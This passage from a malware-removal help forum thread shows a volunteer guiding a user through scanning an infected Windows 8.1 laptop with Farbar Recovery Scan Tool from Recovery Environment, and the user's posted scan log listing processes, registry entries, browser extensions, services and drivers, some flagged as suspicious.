Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-07 20:25:01.994
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 47%
Total physical RAM: 3982.68 MB
Available physical RAM: 2091.84 MB
Total Virtual: 4686.68 MB
Available Virtual: 2875.01 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:145.79 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:2.89 GB) FAT32
 
\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)
 
Partition: GPT.
 
========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


#26 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 12 June 2018 - 01:17 PM

Hi Dan,
 
Your laptop has a nasty infection which is able to render the contents of my Fixlist script ineffective. That's why I emphasized that you need to prepare your thumb drive and keep it away from your sick laptop until after you open Command Prompt in Recovery Environment (RE). Re-read Post #21 and notice the sequence of instructions.

  • Now please delete the copy of Fixlist.txt from your clean PC and from your thumb drive.
  • Download the copy of Fixlist.txt in Post #21 onto your thumb drive, but don't insert the thumb drive into the sick laptop yet.
  • Now open Command Prompt in Recovery Environment as described in Post #21.
  • Only after Command Prompt is open in Recovery Environment insert the thumb drive into the sick laptop and continue with the instructions in Post #21.

It might help you do these steps in the required sequence if you print the instructions from Post #21 and check them off as each step is competed.
 
In your next reply...

  • Copy and paste the entire contents of Fixlog.txt into the body of your message.
  • Copy and post the entire contents of FRST.txt and Addition.txt into the body of your message.
  • Please tell me which programs you tried to run. Did they run successfully?
  • Were you able to connect to BleepingComputer? Which browser did you use?
  • Tell me about any unexpected symptoms you saw.

Thank you,

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#27 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 12 June 2018 - 01:48 PM

Hi Ray ,

 

I did do that in that order and only inserted the thumb drive only after command prompt ,

but let me do the process over again , will be back tomorrow.

 

Best ,

Dan



#28 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 12 June 2018 - 10:53 PM

Hi Dan,

 

If you have already done the steps in my Post #26, then send me the logs. If you have not already done them, then don't bother with the Fixlist.txt file for now. We can get useful info from your laptop by just doing a scan in Recovery Environment. The following instructions are similar but they don't use the Fixlist.txt file and they use the Scan function in the tool instead of the Fix function. Version 06.06.2018 of FRST64.exe on your thumb drive is already up-to-date.

 

Keep the thumb drive out of the laptop until after you enter Recovery Environment and open Command Prompt below.

 

 

Open Command Prompt



Now insert the thumb drive into the sick laptop.


Scan with FRST64.exe and obtain one log

  • In the Command Prompt window, type Notepad and press Enter.
  • From the notepad menu, press File > Open then navigate to your thumb drive and choose All Files.
  • Right click FRST64 and click Run as administrator.
  • Click Scan.
  • The result of the scan will appear in a file called FRST.txt which will be created on your thumb drive in the same location as FRST64.exe.
  • Insert the thumb drive into your clean PC. Then Copy and paste FRST.txt into your reply.

 

If you restart in normal boot, don't expect much improvement because we still need to run the Fixlist script in a later post. The scan, however, should disable the worst component of the infection so that our next run will not be blocked. Your laptop is still very vulnerable because we have not applied most of the repair and we have not reinstalled any antivirus protection yet.

 

In your next reply...

  • Copy and post the entire contents of FRST.txt into the body of your message.

Thank you,

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#29 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 13 June 2018 - 06:09 PM

Hi Ray , 

This is Dan.

 

Here is the txt fix and addtion logs of doing that command prompt again.

I'm also going to do what you said in the last reply and will be back with the txt logs tomorrow.

 

For now , here's the FRST txt - 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01
Ran by Dan (administrator) on BEATLES (12-06-2018 20:43:02)
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\ProgramData\dahhService\dahhService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
() C:\Program Files\Gramblr\gramblr.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
() C:\Program Files (x86)\ASUS\Splendid\my_intel_cpp_x64.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusVibe\AsusVibe2.0.exe
() C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe
(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746
ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4
Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: jefccanc.Daniel-1506042165545
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-06-08]
FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-06-08]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-06-08]
FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff
FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-06-08]
CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]
CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]
CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]
CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]
CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]
CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]
CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]
CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]
CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]
CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]
CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]
CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]
CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]
CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]
CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]
CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]
CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]
CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-06-08]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)
 
S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]
S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)
U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)
S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)
R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)
R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)
R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)
R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]
R3 knquxa; system32\drivers\qtxadh.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-12 20:35 - 2018-06-12 20:35 - 000000000 ____D C:\Users\Dan\AppData\Local\iabokse
2018-06-12 20:33 - 2018-06-12 20:33 - 000142672 ____N C:\Windows\system32\Drivers\cooybehl.sys
